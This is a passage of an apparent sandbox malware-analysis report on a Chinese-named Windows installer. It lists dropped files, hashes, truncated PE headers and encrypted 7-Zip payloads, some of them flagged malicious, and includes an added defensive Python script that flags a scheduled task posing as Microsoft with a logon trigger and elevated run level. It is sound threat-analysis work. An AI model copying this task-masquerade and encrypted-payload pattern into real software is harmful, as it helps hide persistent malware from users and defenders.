                            SHA-256:524961C6D57B298D6AE7B621D54C5C61C0646095C2C4D733C62A8A0D34EE7443
                            SHA-512:7B106EE9262D47C5CDB989D091842733BE6B2A5BE4230A95A6F52969CCECE7B33255FFCD5492563A00F8E408D376078AAF45DE5653CC6766C73070EA169021F4
                            Malicious:false
                            Preview:....7y|[.G...y,Ec..{.$\*....d:d.......a.oR.11;...k!..]..+=..T...L..@..fj [_..../?.f..unW%>.#.-..@ >...)j.....t.l.Z.N.;.a.........A...**.i......+...-..t}:5.,.....n..6._?._9..8_...h...9r...........fs.b.....!..s...{.E...).9..`...:c4.........2!..5`lU.f.'.X]9q.^."...x%.L%>..F..'....I..[g.6...\..`.&<.`vu...q.Oq..h~........"z......_.A/.`1..uc....D.8<3./...[.......4W..._.uO.B.n.q>.......T\.......Q..;.}..z6...m....@...2....=..zp..h......-.yG.D.8......U..)5..Y....iG.....i......A..Kq0.t..q...;........4...........4...q.f_..<...lf.y..2.......9...j..6....|...|]...q....+..XbL_...C*A^..O.*._.. ..H.e*.,.9.'.........y..hFyd..d...J.. Jz:R..l....l&....5...+.m.M,.....`..Bu.V.G,0wj..M....j..i..........~d..".3..k...Jc.HD...VG....y..<....dg....:.&..BD.\D hp.D1.s..MF...c..!.....0.A..?.....6.....}4.+......VWz.N.!.....%0..B.F.....?......*..G9I.Y0.........=..&.e.P....1..}.!....U.9........a......pnF..:d...x.fPJ...=..s.k......?...*..L.wy.......$...l$....._.....p#..&
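The records above are flat `Key:Value` dumps, and the relationships between them are easier to see once they are parsed and cross-correlated: the installer stub under `is-RRU7R.tmp` writes 7-Zip archives, a `7zr.exe` relocated to `C:\Program Files (x86)\Windows NT\` writes same-sized high-entropy `data` blobs, the same 1589569-byte blob (SHA-256 `524961C6...`) is written by both processes, one dropped file is a native-subsystem x64 image, and the scheduled-task XML claims a Microsoft author on a task path of `\kafanbbs` with a logon trigger and `HighestAvailable` run level. The Python script below is an added example and is not part of the Joe Sandbox report or of any tool the report mentions. It re-implements the 8-bit Shannon entropy behind the `Entropy (8bit)` column, parses a constructed excerpt of five records copied from the report, applies four correlation checks, and inspects a trimmed copy of the task XML preview with plain regexes (the preview is truncated, so a real XML parser would reject it). The 7.9 entropy cut-off, the flag names, and the trimmed excerpts are assumptions of this example.

```python
"""Triage of Joe Sandbox 'dropped file' records (added example; not part of the report)."""
import math
import re
from collections import defaultdict

# Constructed excerpt: five records from the report in its flat "Key:Value" layout,
# trimmed to the fields the checks use. Paths, hashes, sizes and entropies are copied from it.
RECORDS_TEXT = r"""Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
File Type:data
Size (bytes):1589569
Entropy (8bit):7.999901863430879
SHA-256:524961C6D57B298D6AE7B621D54C5C61C0646095C2C4D733C62A8A0D34EE7443
Process:C:\Program Files (x86)\Windows NT\7zr.exe
File Type:data
Size (bytes):1589569
Entropy (8bit):7.999901863430879
SHA-256:524961C6D57B298D6AE7B621D54C5C61C0646095C2C4D733C62A8A0D34EE7443
Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
File Type:7-zip archive data, version 0.4
Size (bytes):56562
Entropy (8bit):7.997362278243265
SHA-256:447913D96FBF4EF44D75357CED22E0622633620DB56DC6BD4F88B5E2D5692A9D
Process:C:\Program Files (x86)\Windows NT\7zr.exe
File Type:data
Size (bytes):56562
Entropy (8bit):7.997362278243266
SHA-256:9EA66FE4BBD81419FF083AC21EB847620952B3E664916D4B9800325B36A9B47F
Process:C:\Program Files (x86)\Windows NT\7zr.exe
File Type:PE32+ executable (native) x86-64, for MS Windows
Size (bytes):63640
Entropy (8bit):6.482810107683822
SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
"""

# Trimmed copy of the scheduled-task XML preview from the report; the viewer renders newlines as '.'.
TASK_PREVIEW = (
    '<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. '
    '<Author>Microsoft Corporation</Author>. <URI>\\kafanbbs</URI>. </RegistrationInfo>. '
    '<Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. </LogonTrigger>. </Triggers>. '
    '<Principals>. <Principal id="System">. <RunLevel>HighestAvailable</RunLevel>. </Principal>. '
)

HIGH_ENTROPY = 7.9  # assumed cut-off: this close to the 8.0 ceiling means compressed or encrypted bytes


def shannon_entropy(data: bytes) -> float:
    """Bits per byte in 0.0..8.0, which is what the report's 'Entropy (8bit)' column measures."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_records(text: str) -> list:
    """Split the flat dump into one dict per dropped file; a record starts at a 'Process:' line."""
    records = []
    for line in text.splitlines():
        key, _, value = line.partition(":")  # first ':' only, so 'C:\...' paths survive intact
        if key == "Process":
            records.append({})
        if records:
            records[-1][key] = value
    return records


def triage(records) -> dict:
    """Cross-correlate records; returns {flag: [sha256 or size, ...]} in record order."""
    flags, by_hash, by_size = defaultdict(list), defaultdict(set), defaultdict(set)
    for r in records:
        sha, ftype, ent = r["SHA-256"], r["File Type"], float(r["Entropy (8bit)"])
        by_hash[sha].add(r["Process"])
        by_size[r["Size (bytes)"]].add(sha)
        if ftype == "data" and ent >= HIGH_ENTROPY:  # unrecognised format plus near-random bytes
            flags["opaque_high_entropy_blob"].append(sha)
        if ftype.startswith("PE32+ executable (native)"):  # native subsystem: typically a kernel driver
            flags["native_subsystem_image"].append(sha)
    for sha, procs in by_hash.items():
        if len(procs) > 1:  # identical bytes written by two different processes
            flags["same_content_multiple_writers"].append(sha)
    for size, shas in by_size.items():
        if len(shas) > 1:  # same length, different bytes: candidate input/output pair
            flags["same_size_different_content"].append(size)
    return dict(flags)


def check_task_xml(xml_text: str) -> list:
    """Flag a task definition that claims a Microsoft origin but is not registered under \\Microsoft\\."""
    def tag(name):
        m = re.search(rf"<{name}>(.*?)</{name}>", xml_text, re.S)
        return m.group(1).strip() if m else None
    findings = []
    author, uri, runlevel = tag("Author"), tag("URI"), tag("RunLevel")
    if author == "Microsoft Corporation" and uri and not uri.startswith("\\Microsoft\\"):
        findings.append(f"Microsoft author on non-Microsoft task path {uri}")
    if runlevel == "HighestAvailable":
        findings.append("runs with the highest privileges available to the principal")
    if "<LogonTrigger>" in xml_text:
        findings.append("logon trigger: persistence across reboots")
    return findings


if __name__ == "__main__":
    for name, hits in triage(parse_records(RECORDS_TEXT)).items():
        print(f"{name}: {hits}")
    for finding in check_task_xml(TASK_PREVIEW):
        print("task:", finding)
```

Run against the full report the same parser works on every `Process:`-led block, and the `same_size_different_content` check is the one to extend: every 7-Zip archive in the listing has a `data` companion of exactly the same byte length written by `7zr.exe`, which is worth pulling both files for before assuming the archive was simply extracted.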
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):1.1940658735648508
                            Encrypted:false
                            SSDEEP:3:Nlllul9oj/tz:NllUKj/
                            MD5:1558AA0899C27353A68431EE052EC3C4
                            SHA1:A2601A25140A3703C8553959F4BD0926B31AAFB5
                            SHA-256:3F7936DF95335336DFC5C6BAF55C2628A5AFF0116500ADEE9D40B7DB3941AC88
                            SHA-512:CD213BEB302E73101224C3D40E5593661817AB724AD9A6C5DA0B3E748AD85384676573DBC36AE84FD103958CF55BEB712D7BAA8338F071BC3B5C7A9D5ED08E8C
                            Malicious:false
                            Preview:@...e...................................F............@..........
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606016
                            Entropy (8bit):7.0063494494702985
                            Encrypted:false
                            SSDEEP:49152:/MifTj964EMRY42Kgq7eJEJqx2dhZe71MzuiehWIKxZfAtbyBSfbZmSKiyQF:/M+jcZ42KXw2dhZe71MzSRFyBSDH
                            MD5:95ACD5631A9131DB1FD066565AFC9A67
                            SHA1:8E9473BD632FF0F57FC34EECAC17174341D80D94
                            SHA-256:EA6B71519CD54AB523B822F84D5D4E5B305214DA4C37E96A02D8BC1CB182F58B
                            SHA-512:70188E7AD6B0D9DA5E88EEFC6095F99066F73FDAB10F084E3F2F96B30D8A717BAE75E9C1B476FB996BC86B9A753AAF26F96024D0068090B437EACE6E5BE35681
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 24%
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Fig...........!.....h....................................................7...........@.........................XC.......J..<....07.X....................@7..?...................................................K...............................text....f.......h.................. ..`.rdata..T............l..............@..@.data................b..............@....00cfg.......`(......"(.............@..@.tls.........p(......$(.............@....voltbl.F.....(......&(..................#.q....P.....(......((............. ..`.rsrc...X....07.......6.............@..@.reloc...?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:modified
                            Size (bytes):3606016
                            Entropy (8bit):7.0063494494702985
                            Encrypted:false
                            SSDEEP:49152:/MifTj964EMRY42Kgq7eJEJqx2dhZe71MzuiehWIKxZfAtbyBSfbZmSKiyQF:/M+jcZ42KXw2dhZe71MzSRFyBSDH
                            MD5:95ACD5631A9131DB1FD066565AFC9A67
                            SHA1:8E9473BD632FF0F57FC34EECAC17174341D80D94
                            SHA-256:EA6B71519CD54AB523B822F84D5D4E5B305214DA4C37E96A02D8BC1CB182F58B
                            SHA-512:70188E7AD6B0D9DA5E88EEFC6095F99066F73FDAB10F084E3F2F96B30D8A717BAE75E9C1B476FB996BC86B9A753AAF26F96024D0068090B437EACE6E5BE35681
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 24%
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Fig...........!.....h....................................................7...........@.........................XC.......J..<....07.X....................@7..?...................................................K...............................text....f.......h.................. ..`.rdata..T............l..............@..@.data................b..............@....00cfg.......`(......"(.............@..@.tls.........p(......$(.............@....voltbl.F.....(......&(..................#.q....P.....(......((............. ..`.rsrc...X....07.......6.............@..@.reloc...?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:modified
                            Size (bytes):3366912
                            Entropy (8bit):6.53056162407447
                            Encrypted:false
                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                            MD5:4E9D08C44F409F54940837360055C5AF
                            SHA1:2EBEB4ABC360E89F9C5BE2AA1224FDFE64C2EF3F
                            SHA-256:4255CCECE985C40464674B38FE1236335ECA66FF9B56EB4B8A66172816BE0AFA
                            SHA-512:1B137B0ECC43799E290E2D30310A0747A6991D256F8AD121A83050C0B375E59E48FC84DED9E741EFA4F02648CBA97F1D915FC371B9AC15CB59D38CB089047934
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:ASCII text, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):406
                            Entropy (8bit):5.117520345541057
                            Encrypted:false
                            SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                            MD5:9200058492BCA8F9D88B4877F842C148
                            SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                            SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                            SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                            Malicious:false
                            Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.944057409331432
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 98.04%
                            • Inno Setup installer (109748/4) 1.08%
                            • InstallShield setup (43055/19) 0.42%
                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                            File name:#U5b89#U88c5#U52a9#U624b2.0.5.exe
                            File size:7'064'515 bytes
                            MD5:87a72f4be35eff0b33e71d38146067b6
                            SHA1:18444d42be38abaaa8e41a643f3db7f89338accb
                            SHA256:be5caf69b35ebefb40069de05b80b28f4d89d532dd3661b39e0762556c89585d
                            SHA512:223ad82d28abb92c12a48e058cc08daa2962d9185875ffa97572cc5ec45ce99089389b6a63a0a947a0b4f7222189ac9d9eb026a1c8870580bb1f89f2487ce91a
                            SSDEEP:98304:XwREbtCJ/Nju8kgs2zUPncYVQkpszwcJwQaU6LggFzbgQhNOFdMwZgS:lbtYjk2zGnOkpDY6LggdFjCn
                            TLSH:4A661213F2CBE03EE05E0B3B05B2A15595FB6A216522AE5796ECB4ECCF351601D3E247
                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                            Icon Hash:0c0c2d33ceec80aa
                            Entrypoint:0x4a83bc
                            Entrypoint Section:.itext
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:1
                            File Version Major:6
                            File Version Minor:1
                            Subsystem Version Major:6
                            Subsystem Version Minor:1
                            Import Hash:40ab50289f7ef5fae60801f88d4541fc
                            Instruction
                            push ebp
                            mov ebp, esp
                            add esp, FFFFFFA4h
                            push ebx
                            push esi
                            push edi
                            xor eax, eax
                            mov dword ptr [ebp-3Ch], eax
                            mov dword ptr [ebp-40h], eax
                            mov dword ptr [ebp-5Ch], eax
                            mov dword ptr [ebp-30h], eax
                            mov dword ptr [ebp-38h], eax
                            mov dword ptr [ebp-34h], eax
                            mov dword ptr [ebp-2Ch], eax
                            mov dword ptr [ebp-28h], eax
                            mov dword ptr [ebp-14h], eax
                            mov eax, 004A2EBCh
                            call 00007F95C0AC2E85h
                            xor eax, eax
                            push ebp
                            push 004A8AC1h
                            push dword ptr fs:[eax]
                            mov dword ptr fs:[eax], esp
                            xor edx, edx
                            push ebp
                            push 004A8A7Bh
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            mov eax, dword ptr [004B0634h]
                            call 00007F95C0B5480Bh
                            call 00007F95C0B5435Eh
                            lea edx, dword ptr [ebp-14h]
                            xor eax, eax
                            call 00007F95C0B4F038h
                            mov edx, dword ptr [ebp-14h]
                            mov eax, 004B41F4h
                            call 00007F95C0ABCF33h
                            push 00000002h
                            push 00000000h
                            push 00000001h
                            mov ecx, dword ptr [004B41F4h]
                            mov dl, 01h
                            mov eax, dword ptr [0049CD14h]
                            call 00007F95C0B50363h
                            mov dword ptr [004B41F8h], eax
                            xor edx, edx
                            push ebp
                            push 004A8A27h
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            call 00007F95C0B54893h
                            mov dword ptr [004B4200h], eax
                            mov eax, dword ptr [004B4200h]
                            cmp dword ptr [eax+0Ch], 01h
                            jne 00007F95C0B5B57Ah
                            mov eax, dword ptr [004B4200h]
                            mov edx, 00000028h
                            call 00007F95C0B50C58h
                            mov edx, dword ptr [004B4200h]
                            Name | Virtual Address | Virtual Size | Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x11000 | .rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                            .text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            .rsrc | 0xcb000 | 0x11000 | 0x11000 | 44348e47aa2b07662bc7f060f268583f | False | 0.1877728630514706 | data | 3.723088785801902 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                            RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925
                            RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268
                            RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547
                            RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863
                            RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095
                            RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516
                            RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838
                            RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341
                            RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024
                            RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642
                            RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834
                            RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103
                            RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532
                            RT_STRING | 0xd8e00 | 0x3f8 | data | | | 0.3198818897637795
                            RT_STRING | 0xd91f8 | 0x2dc | data | | | 0.36475409836065575
                            RT_STRING | 0xd94d4 | 0x430 | data | | | 0.40578358208955223
                            RT_STRING | 0xd9904 | 0x44c | data | | | 0.38636363636363635
                            RT_STRING | 0xd9d50 | 0x2d4 | data | | | 0.39226519337016574
                            RT_STRING | 0xda024 | 0xb8 | data | | | 0.6467391304347826
                            RT_STRING | 0xda0dc | 0x9c | data | | | 0.6410256410256411
                            RT_STRING | 0xda178 | 0x374 | data | | | 0.4230769230769231
                            RT_STRING | 0xda4ec | 0x398 | data | | | 0.3358695652173913
                            RT_STRING | 0xda884 | 0x368 | data | | | 0.3795871559633027
                            RT_STRING | 0xdabec | 0x2a4 | data | | | 0.4275147928994083
                            RT_RCDATA | 0xdae90 | 0x10 | data | | | 1.5
                            RT_RCDATA | 0xdaea0 | 0x310 | data | | | 0.6173469387755102
                            RT_RCDATA | 0xdb1b0 | 0x2c | data | | | 1.1818181818181819
                            RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447
                            RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.278328611898017
                            RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
                            DLL | Import
                            kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
